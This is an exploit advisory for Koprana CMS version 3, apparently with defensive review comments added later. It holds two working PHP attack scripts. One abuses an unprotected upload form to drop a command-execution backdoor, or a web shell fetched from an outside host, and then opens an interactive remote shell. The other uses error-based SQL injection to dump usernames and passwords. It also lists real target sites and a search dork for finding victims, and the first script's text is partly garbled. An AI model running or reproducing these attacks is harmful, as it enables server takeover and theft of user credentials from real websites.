
Koprana CMS - Multiple Vulnerabilities

Author: The UnKnØwN , Published: 18-06-2012
====================== Vulnerability info ====================
[+] Exploit Title : Koprana CMS - Multiple Vulnerabilities
[+] Author : The UnKnØwN
[+] Software Link :http://www.mediafire.com/?ekz7a5px3ua3ebz
[+] Version : 3
[+] Category : Webapps
[+] Google Dork : allintext:Template & Design by Nicow - Php & Code by Nicow
[+] Tested on : Windows xp
[+] Demo site : - http://innodrive.redheberg.com/
- http://elink-games.net
- http://serveur-renouveau.fr/site/
============================ Greets ==========================
Greets to : Soka - Hony - ColdFire - kimgx12 - w0dm4n - MOOH Splinter -
The Crazy3D Team and all Algerian h4x0rs
www.izzi-hack.com - www.dofus-exploit.com
===================== Vulnerability details ==================
1) Unprotected upload form in buy1_ontrue.php allows remote file upload
2) Unsanitized POST parameter in vip_ontrue.php allows SQL injection
$personnage = $_POST['perso'];
$sql = "SELECT * FROM personnages WHERE guid = $personnage";
=========================== Exploit ==========================
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
//       - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/* 
load exploits/webapp/koprana_upload.php
set HOST target
set PORT Taget_PORT (default : 80)
set MODE (1 for backdoor upload/2 for shell upload)
set FILE (save format TXT/SQL)
exploit

!koprana_upload
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Exploit Mode 
 */
// Runtime settings: silence PHP warnings, remove the script time limit and
// cap socket waits at 5 seconds. This first listing is extraction-garbled
// throughout (operators and commas dropped, statements split across lines)
// and does not parse as reproduced here; read it for intent only.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout"5);

// http_send: minimal plain-TCP HTTP client. Opens host:port with fsockopen
// (no TLS), writes the raw request and returns the entire response as one
// string. A connect failure is fatal (die). The socket is never closed
// explicitly, so every call holds its handle until the script exits.
function 
http_send($host$port,$packet)
{
    if (!(
$sock fsockopen($host$port)))
        die(
"\n[-] No response from {$host}:{$port}\n");
 
    
fputs($sock$packet);
    return 
stream_get_contents($sock);
}

// Console banner; cosmetic only.
print 
"\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print 
"\n| Koprana CMS Remote Upload Exploit                                   |";
print 
"\n|                                by The UnKn0wN                       |";
print 
"\n|     Greets to : The Crazy3D members and all Algerian h4x0rs         |";
print 
"\n+---------------------------------------------------------------------+";
print 
"\n|           www.Dofus-Exploit.com | WwW.IzzI-Hack.com                 |";
print 
"\n+---------------------------------------------------------------------+\n";

// Argument-count check (the comparison operator was lost in extraction).
// Note the usage text documents three positional arguments (host, path,
// mode) while the assignments that follow read four ($argv[1]..$argv[4],
// with a port in second position); the two disagree.
if (
$argc 3)
{
    print 
"\nUsage......: php $argv[0] <host> <path> <mode>\n";
    print 
"\nExample....: php $argv[0] localhost / 1";
    print 
"\nExample....: php $argv[0] localhost /site/ 2\n";
    die();
}

// Positional arguments: host, port, web-root path, mode.
$host $argv[1];
$port $argv[2];
$path $argv[3];
$mode $argv[4];

// Mode 1 uploads a one-line PHP backdoor. It runs whatever arrives in the
// "Cmd" HTTP request header (base64-decoded) through passthru() and
// prefixes the output with the literal "_code_" so the client can find it.
// For defenders these are three concrete, greppable indicators: a request
// header named Cmd, a newly created sh.php in the document root, and
// "_code_" appearing in response bodies.
$shell "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
// Mode 2 downloads a full web shell from a third-party host at run time and
// uploads it unread, so whoever runs this script executes code controlled
// by that host. The shell's own login is hard-coded in the trailing comment,
// i.e. anyone who knows it can use the dropped file.
$shell2 file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell)

// Mode "2" selects the downloaded shell instead of the one-liner.
if($mode == "2"$shell $shell2;

// multipart/form-data body for the CMS upload form. Field names as the form
// expects them: "fichier" carries the file (declared as sh.php with type
// application/x-php), "execute" submits the form and "dossier" selects the
// destination directory ("./", i.e. the web root itself).
$boundary "---------".str_replace("."""microtime());
$payload  "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/x-php\r\n\r\n";
$payload .= "".$shell."\n\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n";
$payload .= "--{$boundary}\r\n";
$payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n";
$payload .= "--{$boundary}--\r\n";

// POST to index.php?pages=buy1_ontrue, the handler the advisory reports as
// unprotected. The request carries no cookie or credentials of any kind,
// and the server evidently accepts the .php name, the script content type
// and the caller-chosen directory. Application-side fix: require an
// authenticated session, allow-list extensions and content types, store
// uploads outside the document root under server-generated names and serve
// them without script execution. Detection: multipart POSTs to this page
// whose filename ends in .php (or whose "dossier" field is set at all).
$packet  "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";

http_send($host,$port$packet);
// Mode 1: interactive loop against the dropped backdoor. Each command typed
// on STDIN is base64-encoded into the "Cmd" header of a GET for sh.php and
// the reply is searched for the "_code_" marker. The "Upload failed" check
// only tests that the GET returned a non-empty body, so an HTTP error page
// passes it too; real failure only shows up later when the marker is absent.
// Mode 2 just prints the URL of the uploaded shell.
if(
$mode == "1") {

$packet  "GET {$path}sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

if (!(
$sock http_send($host,$port$packet))) die("\n[-] Upload failed!\n");
print 
"[+]Backdoor was upload!\n[+]Getting the shell...\n"
while(
1)
{
    print 
"\nBHR@{$host}# ";
    if ((
$cmd trim(fgets(STDIN))) == "exit") break;
    
preg_match("/_code_(.*)/s"http_send($host,$portsprintf($packetbase64_encode($cmd))), $m) ?
    print 
$m[1] : die("\n[-] Exploit failed!\n");
}
}else
    print 
"Go to {$host}{$path}sh.php to check.\n";

?>



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2) SQLI
(Exploit koprana_injection.php in attachments)
page : http://site/path/index.php?pages=vip_validation
post data : send=Envoyer&perso={inject}

load exploits/webapp/omiworld_injection.php
set HOST target
set MODE (1 for admin accounts/2 for all accounts)
set FILE (save format TXT/SQL)
exploit
============================= END =============================
<?php
//NOTE : - If you are using BHR put this file in \exploits\webapp folder
// - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only)
/*
load exploits/webapp/omiworld_injection.php
set HOST target
set MODE (1 for admin accounts/2 for all accounts)
set FILE (save format TXT/SQL)
exploit


!Koprana_Injection
@ HOST = localhost = Target URL
@ PORT = 80 = Target Port
@ PATH = / = Web site path
@ MODE = 1 = Injection mode
@ FILE = sql = Save type
*/
// Runtime settings: silence PHP warnings (so failures surface only as
// "not vulnerable"/empty results), no script time limit, 5 s socket timeout.
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

// http_send: minimal plain-TCP HTTP client. Opens host:port with fsockopen
// (no TLS), writes the raw request and returns the whole response as one
// string. Connect failure is fatal (die); the socket is never closed, so
// each call keeps its handle until the script exits.
function http_send($host,$port, $packet)
{
if (!($sock = fsockopen($host, $port)))
die("\n[-] No response from {$host}:{$port}\n");

fputs($sock, $packet);
return stream_get_contents($sock);
}
// write_txt: appends one "account:pass:level" line to $file.
// NOTE(review): the parameter list starts with $host, which the body never
// uses and which the call sites in the mode switch below do not pass, so
// the four arguments they supply arrive shifted by one position. fopen's
// return value is not checked.
function write_txt($host, $file, $account, $pass, $level)
{
$save_file = fopen("".$file."", "a+");
fwrite($save_file, "$account:$pass:$level\n");
fclose($save_file);
}
// write_sql: appends one INSERT statement per account to $file. Two points
// for anyone reading the output: the table name is wrapped in single
// quotes, which MySQL parses as a string literal rather than an identifier,
// and the three values are interpolated with no escaping, so a quote inside
// a recovered account name or password yields malformed SQL -- and a file
// that is itself injectable if it is ever imported blindly. fopen's return
// value is not checked.
function write_sql($file, $account, $pass, $level)
{
$save_file = fopen("".$file."", "a+");
fwrite($save_file, "INSERT INTO 'account_inj' VALUES ('$account', '$pass', '$level')\n");
fclose($save_file);
}
// write: appends a per-host header to the output file, as an SQL block
// comment when the target is accounts.sql and as a banner line otherwise.
// Not called anywhere in this listing.
function write($host, $file)
{
$save_file = fopen("".$file."", "a+");
if($file == "accounts.sql")
fwrite($save_file, "/* Accounts of $host */\n");
else
fwrite($save_file, "=========== Accounts of $host ===========\n");
fclose($save_file);
}
// fetch_data: extracts the injected value from the response page. The
// payloads below wrap each value in 0x7e,0x27 ... 0x27,0x7e ("~'" ... "'~")
// and the group-by/floor(rand(0)*2) construct appends a digit, so the page
// is expected to contain ~'VALUE'~1 -- presumably inside the database's
// duplicate-entry error text, which the application echoes to the client
// (see the "Erreur SQL" probe). That echo is what makes error-based
// extraction possible; returning a generic error page removes the oracle
// independently of fixing the query. Both strpos calls assume the markers
// exist: if either is missing, strpos returns false and the substr bounds
// are meaningless. Callers check for an empty result only once, for the
// database name.
function fetch_data($page)
{
$debut = "~'";
$debutTxt = strpos( $page, $debut ) + strlen( $debut );
$fin = "'~1";
$finTxt = strpos( $page, $fin );
$data_fetch = substr($page, $debutTxt, $finTxt - $debutTxt );
return $data_fetch;
}
// PostIt: form-urlencoded POST to index.php?pages=vip_ontrue, the endpoint
// whose "perso" parameter the advisory shows interpolated unquoted into
// "SELECT * FROM personnages WHERE guid = $personnage". The root-cause fix
// is a prepared statement with a bound parameter (guid appears to be
// numeric given the unquoted comparison -- confirm against the schema, in
// which case an integer cast is the minimal hardening). Detection: POSTs to
// this page whose body contains SQL tokens such as information_schema,
// concat( or rand(0).
function PostIt($host,$port,$path,$payload){
$packet = "POST {$path}index.php?pages=vip_ontrue HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: keep-alive\r\n\r\n{$payload}";
return http_send($host,$port, $packet);
}
// Console banner; cosmetic only.
print "\n+-----------------------[ The Crazy3D Team ]--------------------------+";
print "\n| Koprana CMS SQL Injection Exploit |";
print "\n| by The UnKn0wN |";
print "\n| Greets to : The Crazy3D's members and all Algerian h4x0rs |";
print "\n+---------------------------------------------------------------------+";
print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |";
print "\n+---------------------------------------------------------------------+\n";

// Argument-count check. Five values are read below ($argv[1]..$argv[5]) but
// the check only rejects fewer than four, so a missing <save> argument is
// accepted and, being neither "txt" nor anything else, silently selects the
// .sql output.
if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <port> <path> <mode> <save>\n";
print "\nExample....: php $argv[0] localhost 80 / 1 txt ";
print "\nExample....: php $argv[0] localhost 80 /site/ 3 sql \n";
die();
}

// Positional arguments: host, port, web-root path, mode, output format.
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mode = $argv[4];
$file = $argv[5];

// Output file: "txt" selects accounts.txt, anything else accounts.sql.
if($file == "txt") $file = "accounts.txt";
else $file = "accounts.sql";
// Probe payload: appended to the literal "test" with no separating quote,
// so it only breaks the query if the parameter is interpolated raw.
$inj_test = "or '1'='1";
// Error-based extraction of database(): the value is wrapped in 0x7e,0x27
// delimiters and forced into a duplicate-key error via the rand(0)/group by
// construct so the echoed error message carries it (parsed by fetch_data).
$inj_db = " and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_test."";

// Vulnerability check looks for the literal "Erreur SQL" in the response:
// the whole technique depends on the application echoing database error
// text to the client. Returning a generic error (and logging the detail
// server-side) removes that oracle even before the query itself is fixed.
// PHP function names are case-insensitive, so postit() resolves to PostIt().
if(!(preg_match("#Erreur SQL#", postit($host,$port, $path,$payload)))) die ("[-] CMS not vulnerable\n");
else print ("[+] CMS can be exploited!\n");
$payload = "send=Envoyer&perso=test".$inj_db."";
$db = fetch_data(PostIt($host,$port,$path,$payload));
if(empty($db)) die("[-] Can't find the database!\n");
print "[+] Database: ".$db."\n";
// Mode 1 enumerates accounts with level>0 (treated here as administrators),
// mode 2 every account in the `accounts` table of the database found above.
// Each row is recovered with its own error-based query using LIMIT i,1, so
// the attack costs one POST per account plus one for the count -- a burst
// of near-identical POSTs to pages=vip_ontrue is the traffic signature.
// The per-row value is account/pass/level; split() on "[/.-]" therefore
// also breaks on any dot or hyphen inside the data. split() itself was
// deprecated in PHP 5.3 and removed in PHP 7.0. If the pass column comes
// back readable, the CMS stores credentials unhashed -- worth confirming
// against the schema, because it turns this disclosure into immediate
// account takeover and warrants forced password resets after an incident.
switch ($mode)
{
case 1:
$inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts WHERE level>0)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_count_accounts."";
$num = fetch_data(PostIt($host,$port,$path,$payload));
print "[+] Admin accounts: ".$num."\n";
for($i=0; $i<$num; $i++)
{
$inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts WHERE level>0 LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_accounts."";
$data = fetch_data(PostIt($host,$port,$path,$payload));

list($account, $pass, $level) = split('[/.-]', $data);
print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n";

// Both writers are called with four arguments; write_txt declares five.
if($file == "accounts.txt")
write_txt($file, $account, $pass, $level);
else
write_sql($file, $account, $pass, $level);
}
break;
case 2:
$inj_count_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM `".$db."`.accounts)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_count_accounts."";
$num = fetch_data(PostIt($host,$port,$path,$payload));
print "[+] Accounts: ".$num."\n";
for($i=0; $i<$num; $i++)
{
$inj_accounts = " and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,account,0x2f,pass,0x2f,level,0x27,0x7e) FROM `{$db}`.accounts LIMIT {$i},1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1";
$payload = "send=Envoyer&perso=test".$inj_accounts."";
$data = fetch_data(PostIt($host,$port,$path,$payload));

list($account, $pass, $level) = split('[/.-]', $data);
print "Account: {$account}\t Pass: {$pass}\t Level: {$level}\n";

if($file == "accounts.txt")
write_txt($file, $account, $pass, $level);
else
write_sql($file, $account, $pass, $level);
}
break;
}
